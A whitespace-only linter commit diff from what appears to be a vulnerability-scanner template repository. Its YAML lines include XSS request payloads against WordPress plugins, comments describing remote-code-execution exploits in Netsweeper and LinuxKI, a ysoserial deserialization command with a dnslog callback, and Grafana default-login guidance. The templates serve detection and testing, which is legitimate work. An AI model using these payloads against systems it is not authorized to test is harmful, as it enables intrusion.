Satisfying the linter (all errors and warnings)

* whitespace modifications only
2021-08-19 17:44:46 +03:00 · 2021-08-19 17:44:46 +03:00 · 77103bc629
parent 2a320412bf
commit 77103bc629
140 changed files with 543 additions and 543 deletions
--- a/cves/2012/CVE-2012-1835.yaml
+++ b/cves/2012/CVE-2012-1835.yaml
@ -12,10 +12,10 @@ requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-#     - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
+    #  - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
-#     - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+    #  - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
-#     - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+    #  - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
-#     - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+    #  - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
    matchers-condition: and
    matchers:
--- a/cves/2019/CVE-2019-12616.yaml
+++ b/cves/2019/CVE-2019-12616.yaml
@ -32,4 +32,4 @@ requests:
      - type: status
        status:
          - 200
-          - 401 #password protected
+          - 401 # password protected
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@ -10,16 +10,16 @@ info:
    - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
    - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
-  # This template exploits a Python code injection in the Netsweeper
+# This template exploits a Python code injection in the Netsweeper
-  # WebAdmin component's unixlogin.php script, for versions 6.4.4 and
+# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
-  # prior, to execute code as the root user.
+# prior, to execute code as the root user.
-  # Authentication is bypassed by sending a random whitelisted Referer
+# Authentication is bypassed by sending a random whitelisted Referer
-  # header in each request.
+# header in each request.
-  # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
+# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
-  # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
+# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
-  # been confirmed exploitable.
+# been confirmed exploitable.
 requests:
  - method: GET
--- a/cves/2020/CVE-2020-7209.yaml
+++ b/cves/2020/CVE-2020-7209.yaml
@ -13,8 +13,8 @@ info:
    - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
    - https://www.hpe.com/us/en/home.html # vendor homepage
-  # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
+# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
-  # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
 requests:
  - method: GET
--- a/cves/2021/CVE-2021-26295.yaml
+++ b/cves/2021/CVE-2021-26295.yaml
@ -10,9 +10,9 @@ info:
    - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
-  # Note:- This is detection template, To perform deserializes do as below
+# Note:- This is detection template, To perform deserializes do as below
-  # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
+# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
-  # `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
+# `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
 requests:
  - raw:
--- a/default-logins/grafana/grafana-default-credential.yaml
+++ b/default-logins/grafana/grafana-default-credential.yaml
@ -9,8 +9,8 @@ info:
    - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
    - https://github.com/grafana/grafana/issues/14755
-  # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
+# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
-  # So make sure, not to attempt more than 4 password for same valid user.
+# So make sure, not to attempt more than 4 password for same valid user.
 requests:
--- a/dns/azure-takeover-detection.yaml
+++ b/dns/azure-takeover-detection.yaml
@ -8,9 +8,9 @@ info:
  reference:
    - https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
-  # Update the list with more CNAMEs related to Azure
+# Update the list with more CNAMEs related to Azure
-  # You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
+# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
-  # Do not report this without claiming the CNAME.
+# Do not report this without claiming the CNAME.
 dns:
  - name: "{{FQDN}}"
--- a/vulnerabilities/wordpress/wp-slideshow-xss.yaml
+++ b/vulnerabilities/wordpress/wp-slideshow-xss.yaml
@ -11,9 +11,9 @@ requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-#     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+    #     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
-#     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+    #     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
-#     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+    #     - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
    matchers-condition: and
    matchers: